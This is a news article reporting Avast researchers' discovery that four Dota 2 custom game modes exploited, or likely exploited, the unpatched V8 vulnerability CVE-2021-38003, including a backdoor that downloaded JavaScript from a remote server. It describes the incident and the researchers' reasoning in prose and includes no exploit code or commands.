Valve
Researchers have unearthed four game modes that could successfully exploit a critical vulnerability that remained unpatched in the popular Dota 2 video game for 15 months after a fix had become available.
The vulnerability, tracked as CVE-2021-38003, resided in the open source JavaScript engine from Google known as V8, which is incorporated into Dota 2. Although Google patched the vulnerability in October 2021, Dota 2 developer Valve didn’t update its software to use the patched V8 engine until last month after researchers privately alerted the company that the critical vulnerability was being targeted.
Unclear intentions
A hacker took advantage of the delay by publishing a custom game mode last March that exploited the vulnerability, researchers from security firm Avast said. That same month, the same hacker published three additional game modes that very likely also exploited the vulnerability. Besides patching the vulnerability last month, Valve also removed all four modes.
Custom modes are extensions or even completely new games that run on top of Dota 2. They allow people with even basic programming experience to implement their ideas for a game and then submit them to Valve. The game maker then puts the submissions through a verification process and, if they’re approved, publishes them.
The first game mode published by Valve appears to be a proof-of-concept project for exploiting the vulnerability. It was titled “test addon plz ignore” (ID 1556548695) and included a description that urged people not to download or install it. Embedded inside the mode was exploit code for CVE-2021-38003. While some of the exploit was taken from proof-of-concept code published in the Chromium bug tracker, the mode developer wrote much of it from scratch. The mode included lots of commented-out code and a file titled “evil.lua” further suggesting the mode was a test.
Avast researchers went on to find three more custom modes that the same developer had published to Valve. These modes—titled “Overdog no annoying heroes” (id 2776998052), “Custom Hero Brawl” (id 2780728794), and Overthrow RTZ Edition X10 XP (id 2780559339)—took a much more covert approach.
Avast researcher Jan Vojtěšek explained:
The malicious code in these new three game modes is much more subtle. There is no file named evil.lua nor any JavaScript exploit directly visible in the source code. Instead, there’s just a simple backdoor consisting of only about twenty lines of code. This backdoor can execute arbitrary JavaScript downloaded via HTTP, giving the attacker not only the ability to hide the exploit code, but also the ability to update it at their discretion without having to update the entire custom game mode (and going through the risky game mode verification process).
The server these three modes contacted was no longer working when Avast researchers discovered the modes. But given they were published by the same developer 10 days after the first mode, Avast says there’s a high likelihood that downloaded code also exploited CVE-2021-38003.
In an email, Vojtěšek described the operation flow of the backdoor this way:
The victim enters a game, playing one of the malicious game modes.
The game loads as expected, but in the background, a malicious JavaScript contacts the game mode’s server.
The game mode’s server code reaches out to the backdoor’s C&C server, downloads a piece of JavaScript code (presumably, the exploit for CVE-2021-38003), and returns the downloaded code back to the victim.
The victim dynamically executes the downloaded JavaScript. If this was the exploit for CVE-2021-38003, this would result in shellcode execution on the victim machine.
Valve representatives didn’t respond to an email seeking comment for this story.
The researchers looked for additional Dota 2 game modes that exploited the vulnerability, but their trail went cold. Ultimately, that means it’s not possible to determine precisely what the developer’s intentions for the modes were, but the Avast post said there were two reasons to suspect they weren’t purely for benign research.
“First, the attacker did not report the vulnerability to Valve (which would generally be considered a nice thing to do),” Vojtěšek wrote. “Second, the attacker tried to hide the exploit in a stealthy backdoor. Regardless, it’s also possible that the attacker didn’t have purely malicious intentions either, since such an attacker could arguably abuse this vulnerability with a much larger impact.”
